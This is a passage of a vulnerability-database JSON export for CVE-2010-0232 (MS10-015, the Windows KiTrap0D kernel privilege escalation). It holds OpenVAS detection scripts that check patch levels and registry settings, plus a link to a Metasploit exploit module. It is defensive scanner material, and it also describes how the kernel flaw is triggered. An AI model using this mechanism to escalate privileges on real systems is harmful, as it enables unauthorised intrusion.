execution to complete.\")\n end\nend\n\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/ms10_015_kitrap0d.rb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-02T21:13:29", "description": "The host is installed with Microsoft Windows operating system and\nis prone to security bypass vulnerability.\n\nThis NVT has been replaced by NVT secpod_ms10-015.nasl\n(OID:1.3.6.1.4.1.25623.1.0.900740).", "cvss3": {}, "published": "2011-04-11T00:00:00", "type": "openvas", "title": "Microsoft Windows IPv4 Default Configuration Security Bypass Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0232"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:801914", "href": "http://plugins.openvas.org/nasl.php?oid=801914", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms_windows_nic_security_bypass_vuln.nasl 5362 2017-02-20 12:46:39Z cfi $\n#\n# Microsoft Windows IPv4 Default Configuration Security Bypass Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow remote attackers to bypass\ncertain security restrictions and hijack all network traffic without any user.\n\nImpact Level: System.\";\n\ntag_affected = \"Windows 7 Service Pack 1 and prior\nWindows Vista Service Pack 2 and prior\nWindows Server 2008 Service Pack 2 and prior\";\n\ntag_insight = \"The default Network Interception Configuration prefers a new IPv6\nand DHCPv6 service over a currently used IPv4 and DHCPv4 service upon receipt of\nan IPv6 Router Advertisement (RA), and does not provide an option to ignore an\nunexpected RA, which allows remote attackers to conduct man-in-the-middle attacks.\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\";\n\ntag_summary = \"The host is installed with Microsoft Windows operating system and\nis prone to security bypass vulnerability.\n\nThis NVT has been replaced by NVT secpod_ms10-015.nasl\n(OID:1.3.6.1.4.1.25623.1.0.900740).\";\n\nif(description)\n{\n script_id(801914);\n script_version(\"$Revision: 5362 $\");\n script_tag(name:\"deprecated\", value:TRUE);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 13:46:39 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-04-11 14:40:00 +0200 (Mon, 11 Apr 2011)\");\n script_cve_id(\"CVE-2010-0232\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows IPv4 Default Configuration Security Bypass Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://resources.infosecinstitute.com/slaac-attack/\");\n script_xref(name : \"URL\" , value : \"https://lists.immunityinc.com/pipermail/dailydave/20110404/000122.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Windows\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\nexit(66); ## This NVT is deprecated as addressed in secpod_ms10-015.nasl.\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\n\n## Check for OS and Service Pack\nif(hotfix_check_sp(winVista:3, win2008:3, win7:2) <= 0){\n exit(0);\n}\n\ndkey = registry_key_exists(key:\"SYSTEM\\CurrentControlSet\\Services\\Tcpip6\\Parameters\");\nif(!dkey){\n exit(0);\n}\n\n# Checking For the workaround\ndValue = registry_get_dword(key:dkey, item:\"DisabledComponents\");\nif(dValue != NULL && dValue == 0){\n security_message(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:09:55", "description": "The host is installed with Microsoft Windows operating system and\nis prone to Privilege Escalation Vulnerability.\n\nThis NVT has been replaced by NVT secpod_ms10-015.nasl\n(OID:1.3.6.1.4.1.25623.1.0.900740).", "cvss3": {}, "published": "2010-01-22T00:00:00", "type": "openvas", "title": "Microsoft Windows GP Trap Handler Privilege Escalation Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0232"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:800442", "href": "http://plugins.openvas.org/nasl.php?oid=800442", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms_kernel_prv_esc_vuln.nasl 5368 2017-02-20 14:34:16Z cfi $\n#\n# Microsoft Windows #GP Trap Handler Privilege Escalation Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\";\n\ntag_impact = \"Successful exploitation will allow remote attackers to bypass\ncertain security restrictions or can gain escalated privileges via specially\ncrafted attack.\nImpact Level: System.\";\n\ntag_affected = \"Microsoft Windows XP Service Pack 3 and prior.\nMicrosoft Windows 2000 Service Pack 4 and prior.\nMicrosoft Windows Server 2003 Service Pack 2 and prior.\";\n\ntag_insight = \"This issue is due to the kernel not properly handling certain\nexceptions when setting up a VDM (Virtual DOS Machine) context, which\nallows users to gain kernel privileges by setting up a crafted 'DM_TIB'\nin their 'TEB' and reach the 'Ki386BiosCallReturnAddress()' function via\nthe '#GP trap handler (nt!KiTrap0D)'.\";\n\ntag_summary = \"The host is installed with Microsoft Windows operating system and\nis prone to Privilege Escalation Vulnerability.\n\nThis NVT has been replaced by NVT secpod_ms10-015.nasl\n(OID:1.3.6.1.4.1.25623.1.0.900740).\";\n\nif(description)\n{\n script_id(800442);\n script_version(\"$Revision: 5368 $\");\n script_tag(name:\"deprecated\", value:TRUE);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 15:34:16 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-22 16:43:14 +0100 (Fri, 22 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-0232\");\n script_name(\"Microsoft Windows GP Trap Handler Privilege Escalation Vulnerability\");\n\n script_xref(name : \"URL\" , value : \"http://isc.sans.org/diary.html?storyid=8050\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/0179\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/advisory/979682.mspx\");\n script_xref(name : \"URL\" , value : \"http://foro.elhacker.net/bugs_y_exploits/0day_m_iquestcve20100232-t281831.0.html\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\nexit(66); ## This NVT is deprecated as addressed in secpod_ms10-015.nasl.\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4, win2k:5, win2003:3) <= 0){\n exit(0);\n}\n\n# Checking For the workaround\ndkey =\"SOFTWARE\\Policies\\Microsoft\\Windows\\AppCompat\";\nif(registry_key_exists(key:dkey))\n{\n\n dValue = registry_get_dword(key:dkey, item:\"VDMDisallowed\");\n if(dValue != \"1\")\n {\n security_message(0);\n exit(0);\n }\n}\nelse\n{\n security_message(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-07T16:39:04", "description": "The host is installed with Microsoft Windows operating system and\n is prone to Privilege Escalation Vulnerability.\n\n This NVT has been replaced by OID:1.3.6.1.4.1.25623.1.0.900740.", "cvss3": {}, "published": "2010-01-22T00:00:00", "type": "openvas", "title": "Microsoft Windows GP Trap Handler Privilege Escalation Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0232"], "modified": "2020-04-02T00:00:00", "id": "OPENVAS:1361412562310800442", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800442", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows #GP Trap Handler Privilege Escalation Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800442\");\n script_version(\"2020-04-02T11:36:28+0000\");\n script_tag(name:\"deprecated\", value:TRUE);\n script_tag(name:\"last_modification\", value:\"2020-04-02 11:36:28 +0000 (Thu, 02 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-01-22 16:43:14 +0100 (Fri, 22 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-0232\");\n script_name(\"Microsoft Windows GP Trap Handler Privilege Escalation Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://isc.sans.org/diary.html?storyid=8050\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/0179\");\n script_xref(name:\"URL\", value:\"http://www.microsoft.com/technet/security/advisory/979682.mspx\");\n script_xref(name:\"URL\", value:\"http://foro.elhacker.net/bugs_y_exploits/0day_m_iquestcve20100232-t281831.0.html\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Windows\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to bypass\n certain security restrictions or can gain escalated privileges via specially crafted attack.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows XP Service Pack 3 and prior\n\n - Microsoft Windows 2000 Service Pack 4 and prior\n\n - Microsoft Windows Server 2003 Service Pack 2 and prior\");\n\n script_tag(name:\"insight\", value:\"This issue is due to the kernel not properly handling certain\n exceptions when setting up a VDM (Virtual DOS Machine) context, which\n allows users to gain kernel privileges by setting up a crafted 'DM_TIB'\n in their 'TEB' and reach the 'Ki386BiosCallReturnAddress()' function via\n the '#GP trap handler (nt!KiTrap0D)'.\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Microsoft Windows operating system and\n is prone to Privilege Escalation Vulnerability.\n\n This NVT has been replaced by OID:1.3.6.1.4.1.25623.1.0.900740.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\nexit(66); ## This NVT is deprecated as addressed in secpod_ms10-015.nasl.\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-11T15:22:40", "description": "The host is installed with Microsoft Windows operating system and\n is prone to security bypass vulnerability.\n\n This NVT has been replaced by OID:1.3.6.1.4.1.25623.1.0.900740.", "cvss3": {}, "published": "2011-04-11T00:00:00", "type": "openvas", "title": "Microsoft Windows IPv4 Default Configuration Security Bypass Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0232"], "modified": "2020-06-10T00:00:00", "id": "OPENVAS:1361412562310801914", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801914", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows IPv4 Default Configuration Security Bypass Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801914\");\n script_version(\"2020-06-10T11:35:03+0000\");\n script_tag(name:\"deprecated\", value:TRUE);\n script_tag(name:\"last_modification\", value:\"2020-06-10 11:35:03 +0000 (Wed, 10 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-04-11 14:40:00 +0200 (Mon, 11 Apr 2011)\");\n script_cve_id(\"CVE-2010-0232\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows IPv4 Default Configuration Security Bypass Vulnerability\");\n script_xref(name:\"URL\", value:\"http://resources.infosecinstitute.com/slaac-attack/\");\n script_xref(name:\"URL\", value:\"https://lists.immunityinc.com/pipermail/dailydave/20110404/000122.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Windows\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to bypass\n certain security restrictions and hijack all network traffic without any user.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 Service Pack 1 and prior\n\n - Microsoft Windows Vista Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 Service Pack 2 and prior\");\n\n script_tag(name:\"insight\", value:\"The default Network Interception Configuration prefers a new IPv6\n and DHCPv6 service over a currently used IPv4 and DHCPv4 service upon receipt of\n an IPv6 Router Advertisement (RA), and does not provide an option to ignore an\n unexpected RA, which allows remote attackers to conduct man-in-the-middle attacks.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Microsoft Windows operating system and\n is prone to security bypass vulnerability.\n\n This NVT has been replaced by OID:1.3.6.1.4.1.25623.1.0.900740.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\nexit(66); ## This NVT is deprecated as addressed in secpod_ms10-015.nasl.\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-27T19:23:03", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-015.", "cvss3": {}, "published": "2010-02-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Kernel Could Allow Elevation of Privilege (977165)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0232", "CVE-2010-0233"], "modified": "2020-04-23T00:00:00", "id": "OPENVAS:1361412562310900740", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900740", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Kernel Could Allow Elevation of Privilege (977165)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Updated By: Madhuri D <dmadhuri@secpod.com> on 2010-11-18\n# - To detect file version 'Ntoskrnl.exe' on vista, win 2008 and win 7\n#\n# Copyright:\n# Copyright (C) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900740\");\n script_version(\"2020-04-23T12:22:09+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 12:22:09 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-02-10 16:06:43 +0100 (Wed, 10 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-0232\", \"CVE-2010-0233\");\n script_bugtraq_id(37864);\n script_name(\"Microsoft Windows Kernel Could Allow Elevation of Privilege (977165)\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/0179\");\n script_xref(name:\"URL\", value:\"http://www.microsoft.com/technet/security/advisory/979682\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to execute arbitrary code with\n kernel-level privilege.\");\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7\n\n - Microsoft Windows 2K Service Pack 4 and prior\n\n - Microsoft Windows XP Service Pack 3 and prior\n\n - Microsoft Windows 2K3 Service Pack 2 and prior\n\n - Microsoft Windows Vista Service Pack 1/2 and prior\n\n - Microsoft Windows Server 2008 Service Pack 1/2 and prior\");\n script_tag(name:\"insight\", value:\"- Windows Kernel is not properly handling certain exceptions, which can be\n exploited to execute arbitrary code with kernel privileges.\n\n - Windows Kernel is not correctly resetting a pointer when freeing memory,\n which can be exploited to trigger a double-free condition.\");\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS10-015.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-015\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2k:5, win2003:3, winVista:3, win7:1, win2008:3) <= 0){\n exit(0);\n}\n\n# MS10-015 Hotfix check\nif(hotfix_missing(name:\"977165\") == 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n exeVer = fetch_file_version(sysPath:sysPath, file_name:\"ntoskrnl.exe\");\n if(!exeVer){\n exit(0);\n }\n}\n\nif(hotfix_check_sp(win2k:5) > 0)\n{\n if(version_is_less(version:exeVer, test_version:\"5.0.2195.7364\")){\n report = report_fixed_ver(installed_version:exeVer, fixed_version:\"5.0.2195.7364\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n}\n\nelse if(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:exeVer, test_version:\"5.1.2600.3654\")){\n report = report_fixed_ver(installed_version:exeVer, fixed_version:\"5.1.2600.3654\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n else if(\"Service Pack 3\" >< SP)\n {\n if(version_is_less(version:exeVer, test_version:\"5.1.2600.5913\")){\n report = report_fixed_ver(installed_version:exeVer, fixed_version:\"5.1.2600.5913\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:exeVer, test_version:\"5.2.3790.4637\")){\n report = report_fixed_ver(installed_version:exeVer, fixed_version:\"5.2.3790.4637\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n exeVer = fetch_file_version(sysPath:sysPath, file_name:\"ntoskrnl.exe\");\n if(!exeVer){\n exit(0);\n }\n}\n\nif(hotfix_check_sp(winVista:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:exeVer, test_version:\"6.0.6001.18377\")){\n report = report_fixed_ver(installed_version:exeVer, fixed_version:\"6.0.6001.18377\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:exeVer, test_version:\"6.0.6002.18160\")){\n report = report_fixed_ver(installed_version:exeVer, fixed_version:\"6.0.6002.18160\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:exeVer, test_version:\"6.0.6001.18377\")){\n report = report_fixed_ver(installed_version:exeVer, fixed_version:\"6.0.6001.18377\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:exeVer, test_version:\"6.0.6002.18160\")){\n report = report_fixed_ver(installed_version:exeVer, fixed_version:\"6.0.6002.18160\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win7:1) > 0)\n{\n if(version_is_less(version:exeVer, test_version:\"6.1.7600.16481\")){\n report = report_fixed_ver(installed_version:exeVer, fixed_version:\"6.1.7600.16481\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n}\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:10:01", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-015.", "cvss3": {}, "published": "2010-02-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Kernel Could Allow Elevation of Privilege (977165)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0232", "CVE-2010-0233"], "modified": "2017-04-11T00:00:00", "id": "OPENVAS:900740", "href": "http://plugins.openvas.org/nasl.php?oid=900740", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms10-015.nasl 5934 2017-04-11 12:28:28Z antu123 $\n#\n# Microsoft Windows Kernel Could Allow Elevation of Privilege (977165)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Updated By: Madhuri D <dmadhuri@secpod.com> on 2010-11-18\n# - To detect file version 'Ntoskrnl.exe' on vista, win 2008 and win 7\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_id(900740);\n script_version(\"$Revision: 5934 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-11 14:28:28 +0200 (Tue, 11 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-10 16:06:43 +0100 (Wed, 10 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-0232\", \"CVE-2010-0233\");\n script_bugtraq_id(37864);\n script_name(\"Microsoft Windows Kernel Could Allow Elevation of Privilege (977165)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/38265\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/0179\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/advisory/979682.mspx\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : \"Successful exploitation could allow attackers to execute arbitrary code with\n kernel-level privilege.\n Impact Level: System\");\n script_tag(name : \"affected\" , value : \"Micorsoft Windows 7\n Microsoft Windows 2K Service Pack 4 and prior.\n Microsoft Windows XP Service Pack 3 and prior.\n Microsoft Windows 2K3 Service Pack 2 and prior.\n Microsoft Windows Vista Service Pack 1/2 and prior.\n Microsoft Windows Server 2008 Service Pack 1/2 and prior.\");\n script_tag(name : \"insight\" , value : \"- Windows Kernel is not properly handling certain exceptions, which can be\n exploited to execute arbitrary code with kernel privileges.\n - Windows Kernel is not correctly resetting a pointer when freeing memory,\n which can be exploited to trigger a double-free condition.\");\n script_tag(name : \"solution\" , value : \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/Bulletin/MS10-015.mspx\");\n script_tag(name : \"summary\" , value : \"This host is missing a critical security update according to\n Microsoft Bulletin MS10-015.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2k:5, win2003:3, winVista:3, win7:1, win2008:3) <= 0){\n exit(0);\n}\n\n# MS10-015 Hotfix check\nif(hotfix_missing(name:\"977165\") == 0){\n exit(0);\n}\n\n## Get System32 path\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n exeVer = fetch_file_version(sysPath, file_name:\"ntoskrnl.exe\");\n if(!exeVer){\n exit(0);\n }\n}\n\n# Windows 